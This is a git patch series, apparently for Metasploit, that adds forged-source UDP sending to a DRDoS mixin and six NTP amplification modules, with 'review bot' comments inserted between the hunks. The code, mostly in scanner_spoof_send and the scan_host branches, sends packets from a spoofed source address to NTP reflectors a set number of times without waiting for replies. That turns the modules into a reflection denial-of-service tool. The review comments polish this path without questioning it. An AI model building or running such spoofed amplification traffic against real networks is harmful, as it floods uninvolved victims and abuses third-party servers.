From c216cf8c53f0e7d0ea33550a177814e7fa88aa03 Mon Sep 17 00:00:00 2001 From: Josh Abraham Date: Fri, 19 Sep 2014 10:29:05 -0400 Subject: [PATCH 1/5] added spoofing capabilities to udp_scanner --- lib/msf/core/auxiliary/drdos.rb | 13 +++++++++++++ lib/msf/core/auxiliary/udp_scanner.rb | 18 ++++++++++++++++++ 2 files changed, 31 insertions(+) diff --git a/lib/msf/core/auxiliary/drdos.rb b/lib/msf/core/auxiliary/drdos.rb index fdf3f3f93e..b6b08fc5ed 100644 --- a/lib/msf/core/auxiliary/drdos.rb +++ b/lib/msf/core/auxiliary/drdos.rb @@ -8,6 +8,15 @@ module Msf ### module Auxiliary::DRDoS + def initialize(info = {}) + super + register_advanced_options( + [ + OptAddress.new('SRCIP', [false, 'Use this source IP']), + OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]), + ], self.class) + end + def prove_amplification(response_map) vulnerable = false proofs = [] @@ -43,5 +52,9 @@ module Auxiliary::DRDoS [ vulnerable, proofs.join(', ') ] end + def spoofed? + !datastore['SRCIP'].nil? + end + end end diff --git a/lib/msf/core/auxiliary/udp_scanner.rb b/lib/msf/core/auxiliary/udp_scanner.rb index 2891c0da72..b33a573447 100644 --- a/lib/msf/core/auxiliary/udp_scanner.rb +++ b/lib/msf/core/auxiliary/udp_scanner.rb @@ -69,6 +69,24 @@ module Auxiliary::UDPScanner scanner_postscan(batch) end + # Send a spoofed packet to a given host and port + def scanner_spoof_send(data, ip, port, srcip, num_packets=1) + open_pcap + p = PacketFu::UDPPacket.new + p.ip_saddr = srcip + p.ip_daddr = ip + p.ip_ttl = 255 + p.udp_src = (rand((2**16)-1024)+1024).to_i + p.udp_dst = port + p.payload = @probe + p.recalc + 1.upto(num_packets) do |x| + print_status("Sending packet to #{ip} from #{srcip}") + capture_sendto(p, ip) + end + close_pcap + end + # Send a packet to a given host and port def scanner_send(data, ip, port) From 43171141da59f7b2a23f33b85fde2a7bf0a92f3d Mon Sep 17 00:00:00 2001 
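Review bot: The SRCIP description `'Use this source IP'` does not tell the operator what the option does — per the udp_scanner hunk in this same patch the address is written into the IP header of raw packets sent via pcap, and per the later scan_host changes in this series the receive window is set to 0 when it is set, so replies are presumably never collected. Suggest `OptAddress.new('SRCIP', [false, 'Send requests from this spoofed source IP (requires pcap; replies are not collected)'])`. NUM_REQUESTS is only consumed on the spoofed path (scanner_send takes no count), so its description should say it applies only when SRCIP is set.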
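Review bot: spoofed? treats any non-nil SRCIP as a spoof request, so a value that is present but blank (if the datastore can hold one) selects the raw-packet path with an unusable source address; `!datastore['SRCIP'].to_s.empty?` covers both the nil and the blank case. Since other mixins in this series branch on this predicate, a one-line comment would help: `# True when the operator supplied SRCIP, which selects the raw-packet (pcap) send path`.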
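Review bot: close_pcap is only reached if every capture_sendto call returns normally, so an exception raised while sending leaves the pcap handle opened by open_pcap unreleased; the send loop should sit inside begin/ensure so the handle is always closed. Smaller points in the same method: the block parameter `x` in `1.upto(num_packets) do |x|` is unused (`num_packets.times do` says the same thing), the local `p` shadows Kernel#p and a name like `pkt` reads better, and `.to_i` on `rand(...)+1024` is redundant since rand with an Integer argument already returns an Integer. The rewritten shape is below; packet construction is unchanged.
```ruby
  def scanner_spoof_send(data, ip, port, srcip, num_packets=1)
    open_pcap
    begin
      # … unchanged: PacketFu::UDPPacket construction and recalc …
      num_packets.times do
        print_status("Sending packet to #{ip} from #{srcip}")
        capture_sendto(p, ip)
      end
    ensure
      # release the capture handle even if a send raises
      close_pcap
    end
  end
```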
From: Josh Abraham Date: Fri, 19 Sep 2014 11:14:11 -0400 Subject: [PATCH 2/5] update for ntp modules --- modules/auxiliary/scanner/ntp/ntp_monlist.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 8 +++++++- 6 files changed, 42 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index e05385a76f..b32642f26f 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -48,7 +49,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index 2984c57d9a..604b82c4b4 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP 
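Review bot: scan_host writes `datastore['ScannerRecvWindow'] = 0` for every host in the batch, so a per-host callback now carries a persistent side effect on the module datastore and the same write is repeated once per target. The identical hunk appears in ntp_peer_list_dos, ntp_peer_list_sum_dos, ntp_req_nonce_dos, ntp_reslist_dos and ntp_unsettrap_dos in this patch, and in the copy moved to lib/msf/core/auxiliary/ntp.rb in the following patch, where the same point applies. Setting the window once before the scan (for example in scanner_prescan, or wherever SRCIP is validated) keeps scan_host to sending only. Whatever the placement, the assignment needs a why-comment, e.g. `# With a spoofed source no replies are expected here, so do not wait for any`.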
@@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called before the scan block diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index b58429f90c..00ab6a6531 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index 1022b735db..7fd5258e2a 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP 
@@ -37,7 +38,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index 68d9b66263..1bcd568b8d 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -38,7 +39,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 44b3bbc56d..50bb2f61f6 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP 
@@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet From 3fb00ece9ebeb1bd771d52454a140d210984c6a7 Mon Sep 17 00:00:00 2001 From: Josh Abraham Date: Sat, 20 Sep 2014 14:10:00 -0400 Subject: [PATCH 3/5] refactored the code based on PR feedback --- lib/msf/core/auxiliary/ntp.rb | 13 ++++++++++++- lib/msf/core/auxiliary/udp_scanner.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_monlist.rb | 13 +------------ modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 11 ----------- .../auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 11 ----------- modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 11 ----------- modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 11 ----------- modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 11 ----------- 8 files changed, 14 insertions(+), 69 deletions(-) diff --git a/lib/msf/core/auxiliary/ntp.rb b/lib/msf/core/auxiliary/ntp.rb index abaa96b157..8551555b4d 100644 --- a/lib/msf/core/auxiliary/ntp.rb +++ b/lib/msf/core/auxiliary/ntp.rb @@ -1,6 +1,6 @@ # -*- coding: binary -*- require 'rex/proto/ntp' - +require 'msf/core/exploit' module Msf ### @@ -10,6 +10,7 @@ module Msf ### module Auxiliary::NTP + include Exploit::Capture include Auxiliary::Scanner # @@ -29,5 +30,15 @@ module Auxiliary::NTP OptInt.new('IMPLEMENTATION', [true, 'Use this NTP mode 7 implementation', 3]) ], self.class) end + + # Called for each IP in the batch + def scan_host(ip) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end + end end end 
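Review bot: `include Exploit::Capture` in Auxiliary::NTP pulls the pcap-based Capture mixin, and any options it registers, into every module that includes NTP, whether or not SRCIP is ever set; this patch also removes the explicit Capture includes from the six modules, so this line is now the only place the dependency is declared. If that is intended, a one-line comment should say so: `# Capture supplies open_pcap/capture_sendto for the spoofed-source path in scan_host`.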
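Review bot: scan_host calls `spoofed?` and `scanner_spoof_send`, neither of which this module defines or includes — in this series they come from Auxiliary::DRDoS and Auxiliary::UDPScanner respectively — so a module that mixes in Auxiliary::NTP without both fails with NoMethodError at scan time rather than with a clear message. Either guard the branch with `if respond_to?(:spoofed?) && spoofed?` or state the requirement above the method: `# Requires Auxiliary::UDPScanner (scanner_send/scanner_spoof_send) and Auxiliary::DRDoS (spoofed?, SRCIP, NUM_REQUESTS)`. The per-host datastore write in this method is the same issue already noted on the module copies it replaces.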
diff --git a/lib/msf/core/auxiliary/udp_scanner.rb b/lib/msf/core/auxiliary/udp_scanner.rb index b33a573447..eae30f0ff6 100644 --- a/lib/msf/core/auxiliary/udp_scanner.rb +++ b/lib/msf/core/auxiliary/udp_scanner.rb @@ -80,8 +80,8 @@ module Auxiliary::UDPScanner p.udp_dst = port p.payload = @probe p.recalc + print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}") 1.upto(num_packets) do |x| - print_status("Sending packet to #{ip} from #{srcip}") capture_sendto(p, ip) end close_pcap diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index b32642f26f..1dfefca414 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -47,17 +46,7 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - - # Called for each response packet +# Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= { messages: [], peers: [] } @results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new(data) diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index 604b82c4b4..1458ad42f9 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb 
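Review bot: With the per-packet message moved out of the loop, the block parameter `x` in `1.upto(num_packets) do |x|` is no longer referenced; `num_packets.times do` expresses the repeat count without an unused name. The enclosing scanner_spoof_send starts and ends outside this hunk.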
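Review bot: The retained comment is re-added at column 0 (`+# Called for each response packet`) while the `def scanner_process` below it keeps its two-space indent, so this refactor introduces a formatting regression in ntp_monlist.rb that the other five module hunks in the patch do not have; keep `  # Called for each response packet` aligned with the method it describes.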
@@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -35,16 +34,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called before the scan block def scanner_prescan(batch) @results = {} diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index 00ab6a6531..95ff582122 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -35,16 +34,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= [] diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index 7fd5258e2a..7b2968e977 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb 
@@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -36,16 +35,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= [] diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index 1bcd568b8d..0b1455c195 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -37,16 +36,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= [] diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 50bb2f61f6..4620d0b778 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb 
@@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -35,16 +34,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= [] From cd8b1318e069b905d5bee44ece8cabf848366724 Mon Sep 17 00:00:00 2001 From: Josh Abraham Date: Sat, 20 Sep 2014 15:18:58 -0400 Subject: [PATCH 4/5] send data based on input not @probe --- lib/msf/core/auxiliary/udp_scanner.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/udp_scanner.rb b/lib/msf/core/auxiliary/udp_scanner.rb index eae30f0ff6..a7d654a362 100644 --- a/lib/msf/core/auxiliary/udp_scanner.rb +++ b/lib/msf/core/auxiliary/udp_scanner.rb @@ -78,7 +78,7 @@ module Auxiliary::UDPScanner p.ip_ttl = 255 p.udp_src = (rand((2**16)-1024)+1024).to_i p.udp_dst = port - p.payload = @probe + p.payload = data p.recalc print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}") 1.upto(num_packets) do |x| From e86b18cdd48970a9aac9dbb4182d56ee20387cff Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Mon, 22 Sep 2014 11:48:39 -0700 Subject: [PATCH 5/5] Add sanity check for NUM_REQUESTS --- lib/msf/core/auxiliary/drdos.rb | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/lib/msf/core/auxiliary/drdos.rb b/lib/msf/core/auxiliary/drdos.rb index b6b08fc5ed..ddf1ca8fdf 100644 --- a/lib/msf/core/auxiliary/drdos.rb +++ b/lib/msf/core/auxiliary/drdos.rb 
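Review bot: Now that `p.payload = data` sends the caller-supplied buffer, the header comment above scanner_spoof_send (outside this hunk) should document the argument it previously ignored: `# Send +data+ as a UDP packet from spoofed source +srcip+ to +ip+:+port+, +num_packets+ times, unchanged`. The enclosing method starts and ends outside this hunk.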
@@ -17,6 +17,13 @@ module Auxiliary::DRDoS
       ], self.class)
   end
 
+  def setup
+    super
+    if spoofed? && datastore['NUM_REQUESTS'] < 1
+      raise Msf::OptionValidateError.new(['NUM_REQUESTS']), 'The number of requests must be >= 1'
+    end
+  end
+
   def prove_amplification(response_map)
     vulnerable = false
     proofs = []
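Review bot: `datastore['NUM_REQUESTS'] < 1` raises NoMethodError when the value is absent (and ArgumentError if it comes back as an unnormalized string), not the intended OptionValidateError; NUM_REQUESTS was registered as optional in this file, so an operator who unsets it while SRCIP is set gets a stack trace instead of the message. Coercing first keeps the check total: `if spoofed? && datastore['NUM_REQUESTS'].to_i < 1`. A short comment on the guard would also help: `# NUM_REQUESTS only matters on the spoofed path; reject zero or negative counts before the scan starts`.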